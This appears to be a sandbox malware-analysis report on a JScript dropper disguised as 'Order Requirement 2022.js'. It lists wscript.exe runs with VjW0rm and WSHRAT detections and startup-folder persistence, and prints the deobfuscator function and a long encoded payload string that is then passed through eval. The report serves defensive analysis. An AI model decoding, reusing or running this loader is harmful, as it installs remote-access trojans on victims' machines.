                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000006.00000002.845820210.0000026E2A5DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high

                  General

                  Target ID:7
                  Start time:15:56:49
                  Start date:03/10/2022
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
                  Imagebase:0x7ff6f06f0000
                  File size:163840 bytes
                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language

                  General

                  Target ID:8
                  Start time:15:56:59
                  Start date:03/10/2022
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CekIalTska.js"
                  Imagebase:0x7ff6f06f0000
                  File size:163840 bytes
                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000008.00000002.831690125.0000029D80281000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000008.00000003.394046563.0000029D80067000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000008.00000002.823248453.0000029D80067000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 00000008.00000002.891143613.0000029DFD8AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:9
                  Start time:15:57:08
                  Start date:03/10/2022
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Order Requirement 2022.js"
                  Imagebase:0x7ff6f06f0000
                  File size:163840 bytes
                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000009.00000003.436933297.000001A3A0C9D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000009.00000003.436804080.000001A3A0C8A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000009.00000003.436967612.000001A3A0CC6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000009.00000002.459088306.000001A3A05B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000009.00000003.442339424.000001A3A0CC6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000009.00000003.437852144.000001A3A0010000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000009.00000003.436996885.000001A3A01A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000009.00000003.443498942.000001A3A024C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 00000009.00000003.436753264.000001A3A0CA6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:12
                  Start time:15:57:22
                  Start date:03/10/2022
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
                  Imagebase:0x7ff6f06f0000
                  File size:163840 bytes
                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 0000000C.00000002.843784726.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 0000000C.00000003.513971058.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 0000000C.00000002.844278843.000001531A030000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 0000000C.00000003.444103192.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 0000000C.00000003.444077557.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 0000000C.00000003.514256730.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:13
                  Start time:15:57:22
                  Start date:03/10/2022
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Order Requirement 2022.js
                  Imagebase:0x7ff6f06f0000
                  File size:163840 bytes
                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 0000000D.00000002.894056339.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 0000000D.00000003.525478987.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 0000000D.00000002.882434337.000001B9F39C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 0000000D.00000003.475419032.000001B9F3810000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 0000000D.00000003.525911410.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 0000000D.00000003.524775302.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 0000000D.00000003.473292279.000001B9F43D4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 0000000D.00000003.525586861.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 0000000D.00000003.473654682.000001B9F43BB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 0000000D.00000003.473826322.000001B9F43CB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 0000000D.00000003.473870911.000001B9F3994000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 0000000D.00000003.525101810.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 0000000D.00000003.475028155.000001B9F3803000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: 0000000D.00000002.883442418.000001B9F3D60000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:14
                  Start time:15:57:39
                  Start date:03/10/2022
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\CekIalTska.js
                  Imagebase:0x7ff6f06f0000
                  File size:163840 bytes
                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 0000000E.00000002.845740262.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 0000000E.00000003.546167949.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 0000000E.00000003.481502625.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 0000000E.00000002.847586711.000001E4568C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 0000000E.00000003.546431289.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_VjW0rm, Description: Yara detected VjW0rm, Source: 0000000E.00000003.481574240.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

                  Disassembly

                  Code Analysis

                  Call Graph

                  • Executed
                  • Not Executed
                  callgraph clusterC0 clusterC2C0 clusterC4C2 clusterC6C2 clusterC8C2 clusterC10C0 clusterC12C0 clusterC14C12 clusterC16C12 clusterC18C0 clusterC20C0 clusterC22C20 clusterC24C0 clusterC26C24 clusterC28C0 clusterC30C28 clusterC32C0 clusterC34C32 clusterC36C0 clusterC38C0 clusterC40C38 clusterC42C0 clusterC44C42 clusterC46C0 E1C0 entry:C0 F3C2 E1C0->F3C2 F11C10 $5FZwLPDuLmhd3toN49z E1C0->F11C10 F19C18 j E1C0->F19C18 F25C24 decodeBase64 E1C0->F25C24 F37C36 _0xe92f92 E1C0->F37C36 F47C46 eval E1C0->F47C46 F5C4 join F3C2->F5C4 F7C6 reverse F3C2->F7C6 F9C8 split F3C2->F9C8 F13C12 F15C14 parseInt F13C12->F15C14 F17C16 d F13C12->F17C16 F39C38 a F13C12->F39C38 F21C20 b F21C20->F39C38 F23C22 F27C26 parseInt F25C24->F27C26 F29C28 _0x22f8 F43C42 _0x45f4 F29C28->F43C42 F31C30 F33C32 F33C32->F29C28 F35C34 parseInt F33C32->F35C34 F33C32->F43C42 F41C40 F45C44

                  Script:

                  Code
                  0
                  $5FZwLPDuLmhd3toN49z =
                    1
                    function (n) {
                    • $5FZwLPDuLmhd3toN49z(9) ➔ "CreateObject"
                    • $5FZwLPDuLmhd3toN49z(7) ➔ "173920wjKeEW"
                    • $5FZwLPDuLmhd3toN49z(10) ➔ "microsoft.xmldom"
                    • $5FZwLPDuLmhd3toN49z(6) ➔ "213970IFnRnT"
                    • $5FZwLPDuLmhd3toN49z(11) ➔ "100300VuLhdD"
                    • $5FZwLPDuLmhd3toN49z(5) ➔ "467406MQaxVE"
                    • $5FZwLPDuLmhd3toN49z(12) ➔ "nodeTypedValue"
                    • $5FZwLPDuLmhd3toN49z(4) ➔ "188136jibKis"
                    • $5FZwLPDuLmhd3toN49z(13) ➔ "adodb.stream"
                    • $5FZwLPDuLmhd3toN49z(3) ➔ "13540351cqrbma"
                    2
                    if ( typeof ( $5FZwLPDuLmhd3toN49z.list[n] ) == "string" )
                      3
                      return $5FZwLPDuLmhd3toN49z.list[n].split ( "" ).reverse ( ).join ( "" );
                      • "tcejbOetaerC".split("") ➔ t,c,e,j,b,O,e,t,a,e,r,C
                      • t,c,e,j,b,O,e,t,a,e,r,C.reverse() ➔ C,r,e,a,t,e,O,b,j,e,c,t
                      • C,r,e,a,t,e,O,b,j,e,c,t.join("") ➔ "CreateObject"
                      • "WEeKjw029371".split("") ➔ W,E,e,K,j,w,0,2,9,3,7,1
                      • W,E,e,K,j,w,0,2,9,3,7,1.reverse() ➔ 1,7,3,9,2,0,w,j,K,e,E,W
                      • 1,7,3,9,2,0,w,j,K,e,E,W.join("") ➔ "173920wjKeEW"
                      • "modlmx.tfosorcim".split("") ➔ m,o,d,l,m,x,.,t,f,o,s,o,r,c,i,m
                      • m,o,d,l,m,x,.,t,f,o,s,o,r,c,i,m.reverse() ➔ m,i,c,r,o,s,o,f,t,.,x,m,l,d,o,m
                      • m,i,c,r,o,s,o,f,t,.,x,m,l,d,o,m.join("") ➔ "microsoft.xmldom"
                      • "TnRnFI079312".split("") ➔ T,n,R,n,F,I,0,7,9,3,1,2
                      • T,n,R,n,F,I,0,7,9,3,1,2.reverse() ➔ 2,1,3,9,7,0,I,F,n,R,n,T
                      • 2,1,3,9,7,0,I,F,n,R,n,T.join("") ➔ "213970IFnRnT"
                      • "DdhLuV003001".split("") ➔ D,d,h,L,u,V,0,0,3,0,0,1
                      • D,d,h,L,u,V,0,0,3,0,0,1.reverse() ➔ 1,0,0,3,0,0,V,u,L,h,d,D
                      • 1,0,0,3,0,0,V,u,L,h,d,D.join("") ➔ "100300VuLhdD"
                      • "EVxaQM604764".split("") ➔ E,V,x,a,Q,M,6,0,4,7,6,4
                      • E,V,x,a,Q,M,6,0,4,7,6,4.reverse() ➔ 4,6,7,4,0,6,M,Q,a,x,V,E
                      • 4,6,7,4,0,6,M,Q,a,x,V,E.join("") ➔ "467406MQaxVE"
                      • "eulaVdepyTedon".split("") ➔ e,u,l,a,V,d,e,p,y,T,e,d,o,n
                      • e,u,l,a,V,d,e,p,y,T,e,d,o,n.reverse() ➔ n,o,d,e,T,y,p,e,d,V,a,l,u,e
                      • n,o,d,e,T,y,p,e,d,V,a,l,u,e.join("") ➔ "nodeTypedValue"
                      • "siKbij631881".split("") ➔ s,i,K,b,i,j,6,3,1,8,8,1
                      • s,i,K,b,i,j,6,3,1,8,8,1.reverse() ➔ 1,8,8,1,3,6,j,i,b,K,i,s
                      • 1,8,8,1,3,6,j,i,b,K,i,s.join("") ➔ "188136jibKis"
                      • "maerts.bdoda".split("") ➔ m,a,e,r,t,s,.,b,d,o,d,a
                      • m,a,e,r,t,s,.,b,d,o,d,a.reverse() ➔ a,d,o,d,b,.,s,t,r,e,a,m
                      • a,d,o,d,b,.,s,t,r,e,a,m.join("") ➔ "adodb.stream"
                      • "ambrqc15304531".split("") ➔ a,m,b,r,q,c,1,5,3,0,4,5,3,1
                      • a,m,b,r,q,c,1,5,3,0,4,5,3,1.reverse() ➔ 1,3,5,4,0,3,5,1,c,q,r,b,m,a
                      • 1,3,5,4,0,3,5,1,c,q,r,b,m,a.join("") ➔ "13540351cqrbma"
                      4
                      return $5FZwLPDuLmhd3toN49z.list[n];
                        5
                        };
                          6
                          $5FZwLPDuLmhd3toN49z.list = [ />!/g, "vHBWeN212151", "uXWmnN5292711", "ambrqc15304531", "siKbij631881", "EVxaQM604764", "TnRnFI079312", "WEeKjw029371", "=oQD9pQD9pQD7BSKyJXZog2Y0F2Yg0nCNsTKlVnc0xib3ByKgICXcJCIr!>Ca0FGUuYGblNlLpcDKlNWYwNVZtFmTu!>XYgwSdmhSZslmR5B3bD5ycmpQD7kiMoI3Qg0DIwFGIyFmdK0wegknc0pQD9pQD7BSKyJXZog2Y0F2Yg0nCNsTKdVzWnxiIiwlIgsCI1ZGIr!>iIiwlIsICRyIzTaVkS3czVi!>yKg01MbdGIr!>SXws1ZoUGdpJ3VnVmUug2cK0wegknc0pQD7BSKoMnTg42bpR3YuVnZK0QfK0QfK0QfK0wOrFWZyJmCNsjclJWb15GbhlmclNXZtVHbvZnL0lGIuJXd0VmcK0wOpgSblRXau4WZg0DI0lGIyFmdK0wegkSKoQHel5UZ29Wbu4WZ7kCKk5WR0FmLuVWIgsDKgI3bmpQD7kycoI3b0Fmcl1WduVEI3Vmbg0DIuVGIyFmdK0wOp0VMblHKm90clNmbhR3culkLp0FMblHK0NWZqJ2T0V2Rg0DIzpQD7BSK20TPOhCImlmCN0nCN0nCNsTZtFmT5FGbwNXaE5CdpBibyVHdlJnCNsHIlNHblBSfK0QfK0wOl1WYOlXYsB3cpRkL0lGIuJXd0VmcK0wOpgSblRXau4WZg0DI0lmCNsHIpkCK0hXZOVmdv1mLuV2OpgCZuVEdh5iblFCI7gCIy9mZK0wOpMHKy9GdhJXZtVnbFBydl5GI9!>iblpQD7kSXzsVeoY2TzV2YuFGdz5WSukyZtdHK0NWZqJ2T0V2Rg0DIzpQD7IiMi!>yKgcWb3BSPgcWb3pQD7BSKncCI90TIgIHdzhCImlmCN0nCNsTZtFmT5FGbwNXaE5CdpBSPgIHdzBichZnCNsTKo0WZ0lmLuVGI9!>CdpBichZnCNsHIpkCK0hXZOVmdv1mLuV2OpgCZuVEdh5iblFCI7gCIy9mZK0wOpMHKy9GdhJXZtVnbFBydl5GI9!>iblBichZnCNsTKdNzW5hiZPNXZj5WY0NnbJ5SKn12doQ3YlpmYPRXZHBSPgMnCNsjIyVGduV2Y5RXayV3YlNHXcR3bvJHXcR3cvhGbhN2bsxFXcxlOzRXbn1mbpdnIg0DIn12dgIXY2pQD7BSK0!>SP9!>iTo!>iZppQD9pQD9pQD7sWYlJnYK0wOu9Wa0BXYD5CdpBibyVHdlJnCNsTKo0WZ0lmLuVGI9!>CdpBichZnCNsHIpkCK0hXZOVmdv1mLuV2OpgCZuVEdh5iblFCI7gCIy9mZK0wOpMHKy9GdhJXZtVnbFBydl5GI9!>iblBichZnCNsTKdJzW5hiZPNXZj5WY0NnbJ5SKdBzW5hCdjVmai9EdldEI9!>ycK0wegkiMg0TPg4EKgYWaK0wOzBichZnCNsHIp4EKi9EIu9Wa0Nmb1ZmCN0nCNsTKd50WqhCdjVmai9EWlZXa0NWQgcXZuBibyVHdlJnCNsHIp4EKyNEIu9Wa0Nmb1ZmCN0nCNszcg4mc1RXZypQD7g2QgsCIVByKgg2QgsCIU5EIr!>CaDByKgg2QgsCIpQDKi9EIr!>CaDByKgkiMoI2TgsCIoNEIr!>SKiUUTB5kUFNVVigCeFByKgg2QgsCIpISRNFkTSVEVVBVTPNkIogXRgsCIoNEIr!>iTWBSPgMnCN0nCNsjIP5kIg0DIU5kCNsHIlNHblBSfK0wOiMVRZJSPgQlTK0wegkSKiUGel5yYiZHXcdjM3!>TNu!>jLyYHXctmcvdXZtFmcGxFXUVkTuQnZvN3byNWaNxFXi!>yKgkiIylGZul2VigCeFhyc0NXa4VWZslmZuMnZo!>iZppQD7kGLU5ELzBichZnCNsHIpgiZuBibvlGdj5WdmpQD9pQD7QHelRXZz52bwNXZy5CWg4mc1RXZypQD7kSQoQmblNnLYpQD7kSKoYmbsIiO05WZnFULyV2cVJCKyVGZhVGS0NXZ1FXZSRXZT5CWK0wOpU2csFmZgwyQgsCIn8CN3kzN6gTOx4SMzIjL2MjMuUDOx8yL6!>Hd0h2JscCVT9EUngiblB3buglCNsTKzgicDBSPggFIyFmdK0wegkSQsMEK0BFIu9Wa0Nmb1ZmCN0nCNsTKiUiIgsCITByKgISJigycn5WayR3U05WZt52bylmduVEZuFGc4VkLoNHIuJXd0VmcK0wegkyUogXRg42bpR3YuVnZK0wOgkSZ1JHdo!>SZslGa3BSfK0wOp!>DMwcDKwVWZsNlL0BXayN2UXpQD9pQD7BSKyJXZog2Y0F2Yg0nCN0nCNsTKyMHKuVncug2cK0wOpgSZz9GbD5SampQD7kSXxsFUoUGdpJ3VukmZK0wOpUWdyRHLyMHKlxWaGRHelRVZ0FWZyNkLzZGI9!>SamBichZnCNsTXysFUgsCIiwFXi!>yKgkiIw1WZ0JCK4VEI9!>iMzBichZnCNsHIpIiRSJCI90TPg0FMbBFKgYWaK0QfK0wOpEDK0lWdR5CdwlmcjN1VK0wOpIzcowWY2VmCNsTKpdWZyxiIlUmTnJVJigSZjFGbwVmcukickZHLiIHZmNXJigSZjFGbwVmcukib3xiIuViIoU2YhxGclJnLpUnZsIiZlICKlNWYsBXZy5iMzBSPgIzcK0wOiQkMy8kWFp0N3clIg0DIpdWZyBichZnCNsTdmBSPgIHZ2BichZnCNsTXxsFUg0DIyMHIyFmdK0wegkiIuVlIg0TP9!>SXwsFUo!>iZppQD9pQD7kSMoQXa1FlL0BXayN2UXpQD7kiNsIiIcJCIr!>iMzByKgIiIcBiQv8CIlhXZuQHcpJ3YzdnIo4Wdy5CazpQD7kCKlN3bsNkLmR3YK0wOpU3ZoUGdpJ3VuYGdjpQD7kiI8ZFfiwiI8VFfigSZjFGbwVmcuU3Zg0DI1dmCNsTXxsFUg0DI1dGIyFmdK0wOpUWdyRHLyMHKlxWaGRHelRVZ0FWZyNkLzZGI9!>iZ0NGIyFmdK0wOdJzWQByKgICXcJCIr!>SKi!>XblRnIogXRg0DIyMHIyFmdK0wegkiIwVlIg0TP9!>SXwsFUo!>iZppQD9pQD7kSMoQXa1FlL0BXayN2UXpQD7kiIiwlIgsCI1ZGIr!>iIiwFIC9yLgUGel5CdwlmcjN3digib1JnLoNnCNsTKoU2cvx2Quk2dK0wOpInZoUGdpJ3Vuk2dK0wOpU2csFmZsIDL1ZGKlxWaGRHelRlblB3TuMnZg0DIpdHIyFmdK0wOp0VMbBFLdBzWOZFKlNWYsBXZy5icmBSPgInZK0wOpIyXigCdpxGcz5iTWBSPg4kVK0wOpgSZz9GbD5SaypQD7kCKsxWQkFWZS5SayBSPgInZgIXY2pQD7kSMsUnZoUGbpZEd4VGVuVGcP5ycmBSPgkmcgIXY2pQD7BSKi4mUi!>SP90DIdBzWQhCImlmCN0nCNsTKdFzWQhCbhZXZK0wegkiI4VkIg0TP9!>SXwsFUo!>iZppQD9pQD7kiMzhib1JnLoNnCNsTKoU2cvx2QukmZK0wOp0VMbBFKlRXaydlLpZmCNsTKlVnc0xiMzhSZslmR0hXZUVGdhVmcD5ycmBSPgkmZgIXY2pQD70lMbBFIr!>iIcxlIgsCIpICctVGdigCeFBSPgIzcgIXY2pQD7BSKiM2Ui!>SP90DIdBzWQhCImlmCN0nCNsTKxgCdpVXUuQHcpJ3YTdlCNsHIpICbDJCI90TPg0FMbBFKgYWaK0wOpwGczhCdpxGcz5CUg0DIQpQD7kyJnwyJlJnVngCdQBSPg!>FIyFmdK0wegknc0pQD7BybkpQD7kCKz5kCN0nCN0nCNsTKdVzWnxSVs0lMbdGKlRXayd1ZlJlLoNnCNsjIFNFTBZkIg0DIVpQD7BSZzxWZg0nCNsTKdVzWnxSVs0lMbdGKlRXayd1ZlJlLoNnCNsjIFVlUUJCI9!>SVK0wegkib3ByKgICXcpjIg0TPg0VMbZ3cgsCIiwFX6ICKgYWaK0wOpICXcJCK0lGbwNnL1ZGI9!>idzBichZnCNsHIpInclhCajRXYjBSfK0wOp0lMbdGKkFWZSdWZS5CazBSPgUlCNsHI5JHdK0wOVBichZnCNsTZtFmT0BXayN2UuQHcpJ3YTdFI9!>ib3BichZnCNsTZtFmTsxWdGRHcpJ3YT5CdwlmcjN1Vg0DI1ZGIyFmdK0wOpYDKi9EIr!>iIfJCIr!>iItJHM3pmdi!>SPg4kVgIXY2pQD7ICXcJCI9!>CaDBichZnCNsjI8ZFfi!>SPgwGczBichZnCNsTKxgicDBSPgMnZgIXY2pQD7kCMoI3Qg0DIoNHIyFmdK0wOddCdjVHZvJHUzVncpZVa05WQnwiItVGdzl3Un5Wa0FmclB3TfJzMul2ViwiIrNXakxWYjl2Zvx2XyMjbpdnIsIiOzRXbn1mbpdnIbBSPgkHIyFmdK0wOdJCXc52bjlGdsVXYmVGZcxlIsIiWT91RFJlIsICXcNXZzNXYsNEXcVkUBdFVG90UcxVTMtESiwiIcxlb1JFXc52bpNnclZFduVmcyV3Qcx1c39GZul2VcxFdm92cvJ3Yp1EXcVmchdHdm92UcxlIsISbyBzdqZHXcV1QLhkIsISTMtESiwiIVN0SIJyWg0DInBichZnCNsTXi!>FVUhETNhlL0Z2bz9mcjlWTiwiIu9Wa0F2YpxGcwFkLsxWZoNlIsICdjVmai9UblR3c5NVZslmRucmbpRHcpJ3YTJCLiwGblh2UuQHcpJ3YTdlIbBSPgoGIyFmdK0gelJXZtVWasNFI6!>iclRHdpdHVg4TLgoXZyVWbllGbTBCfgEDMC9ldgknYgQWZk92Qg8yLK0wOsxWduBSPgEDbsVGaTh2c3pQfKsTZ1xWYWRWZwlHVlR2bu5CTFBibyVHdlJnC7QjNlNXYiBSPgQHelRnLMVkC7ICN2U2chJmLulmYi!>SPgUGc5RVY0FGZuwURKsTKi!>Xb0JCK05WZtVGbFVGdhVmcj5STEBSPgwURgIXY2pwOpISTPRETNhlL0Z2bz9mcjlWTigCdjVmai9UZ0FWZyNkL0BXayN2UXBSPg0ERgIXY2pwepQjNlNXYihCN2U2chJUZk92YlRGIu9Wa0Nmb1ZmC9pQfKsXKyJXZog2Y0F2Y9pwOpIDIsUGbpZGKlxWaG9GVlZXYT5SbhVmc0NVeyFmbpJmC7kyclRXeihSZ0lmcX5SbhVmc0NVeyFmbpJmC7kCKuVGcP5SbhVmc0NVeyFmbpJmC7EDI9!>SZwlHVu0WYlJHdTlnch5WaipwOpISbhVmc0NlLCR0TEFkIoQ3YlpmYPVGdhVmcD5CdwlmcjN1Vg0DItFWZyR3U5JXYulmYgIXY2pwe5JHdKsXKzVGd5JGIsUGbpZGKzVGd5JUZ0lmc3BibvlGdj5WdmpQf7liclhCajRXYj1nC7kiIiwlIgsCIxgGdhBnY1R3cgsCIiICXgI0Lv!>CdwlmcjN3digib1JnLxwGblh2UoN3dKsTKxQWZk92YlRGIsEDa0FGciVHdzhyclRXeCVGdpJ3dKsTKxQHelR1Zu9GboQjNlNXYCVGZvNWZkBSPgEDZlR2bjVGZgIXY2pwOiMnau4GSsF0boBHRFRHXcJCIr!>SMylGZhRXYkBHchBSPgEDa0FGciVHdzBichZnC7kiIlEGdhRGcwFWJigycn5WayR3U05WZt52bylmduVEZuFGc4VkLxwGblh2UoN3dg0DIxIXakFGdhRGcwFGIyFmdKsTKiwGblh2UuQHcpJ3YTdlIoQ3YlpmYPVGdhVmcD5CdwlmcjN1Vg0DIxwGblh2UoN3dgIXY2pwOi0TPnNkTzR1SwgGWaVlUXp1a5ITWsJ1RLNnRtRGbwFFR5!>XUEdzaDtEcwgUSn9WUEdTWGlUdKhFZwYVbjdWQDl0ZvFFR3I0UL9GNyIGcSNTW1ZlbadGMElEMZdlTwcGSNZGaDlUdKhFZwYVbjdWQpNkTzRFWkJleNJmUqJWaK52YzgjRJNHMx0kezZkT1pUbjlHZ6h1Z3NFW51keXBDNtlVeKNjTmJ0QMRmR61kYSpmYppkbjNDOGl0cwYUT6NnROVnStNWekpHWnd3UYVTS6dFM00WW5p0MOZmQDxEZopWTiJlailmSuN2M4YUSzBTMOl3cG5UdK12Y5RmeYd2dThlMJp3VwQTbZlnSz4kZCNETkZlaNJmUqJWaK52YzgjRJNHMx4kYSpmYppkbjNDOGl0cwYkT5NnROVnStNWekpHWnd3UYpXS6dFM00WW5p0MOZmQDxEZSp3VwQTbZlnSz4kZCNETkpkaNJmUqJWaK52YzgjRJNHMW1UezZkT1pUbjlHZ6h1Z3NFW3lkeXBDNtlVeKNjTmJ0QMRGbU1kYSpmYppkbjNDOGl0cwY0T4NnROVnStNWekpHWnd3UYNTR6dFM00WW5p0MOZmQDxEZaRVTiJlailmSuN2M4YUSzBjVOh3cG5UdK12Y5RmeYd2dThFMFp3VwQTbZlnSz4kZCNETk5EVNJmUqJWaK52YzgjRJNHMs1EezZkT1pUbjlHZ6h1Z3NFW4VkeXBDNtlVeKNjTmRnRJlTQpZ1ZJhVWyI0QJtEM3V2ZrN0Swk1VOBzZI1kZClmY2x2RkpWNXRWbwFFR5!>XUEdzaDtEcwgUSn9WUEdTSIRmeClmY5ZFSkxmSIl0ZBNUSLBzdld2aDtUd5cVYw4UbiFjWHlUOBNVWvFUailnVIRGbKhUSn9WUEdDMWhlMRp3VzM3Ri9mSu5kZCNETkZFROJGZ6F2co12YygjRJNHMG5EMzFjTyh3RhlnW6h1Z3NFW6FleXNzcHJ2bK5mTmJ0QMRmR6d1MzdkYvpkbOZmQDxEZKRkTiRmehNHatNmM4YUSzBjVNBzcx4kc4dUY5pleYd2dTh1dRp3VzM3Ri9mSu5kZCNETkxmeNJGZ6F2co12YygjRJNHMG9kezFjTyh3RhlnW6h1Z3NFWz0keXNzcHJ2bK5mTmJ0QMRmW61kYkpXYzhWbjJDOGl0cwYlT6NXMOJHeHFWeapHWnd3UY